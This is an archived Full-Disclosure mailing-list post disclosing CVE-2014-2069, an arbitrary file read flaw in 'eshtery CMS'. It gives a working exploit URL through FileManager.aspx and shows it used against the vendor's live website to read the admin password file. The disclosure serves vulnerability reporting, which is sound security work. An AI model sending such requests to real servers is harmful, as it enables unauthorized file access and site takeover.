| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <2014022211292127097428@dbappsecurity.com.cn> Date: Sat, 22 Feb 2014 11:29:22 +0800 From: peng.deng <peng.deng@...ppsecurity.com.cn> To: full-disclosure <full-disclosure@...ts.grok.org.uk> Cc: bugtraq <bugtraq@...urityfocus.com> Subject: [CVE-2014-2069] 'eshtery CMS' allows remote attackers to read arbitrary files Hi All, [CVE-2014-2069] 'eshtery CMS' allows remote attackers to read arbitrary files,Since I am unable to contact the relevant manufacturers, all I'll send you the details vulnerabilities, as follows: [»] Language: [ ASP and aspx ] [»] Version: [ version update: 2013-04-03 (http://sourceforge.net/projects/eshtery/) ]########################################################################### ===[ Exploit ]=== [»] http://server/[path]/FileManager.aspx?file=E:\web\admin.asp Examples are the official website: http://eshtery.she7ata.com/projects/eshtery//FileManager.aspx?file=E:\web\she7atac\admin.asp Administrator password to use to read, we can successfully control site management background, a very serious problem Content of type "text/html" skipped Download attachment "Catch.jpg" of type "image/jpeg" (126673 bytes) Download attachment "CatchEA2A.jpg" of type "image/jpeg" (143832 bytes) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists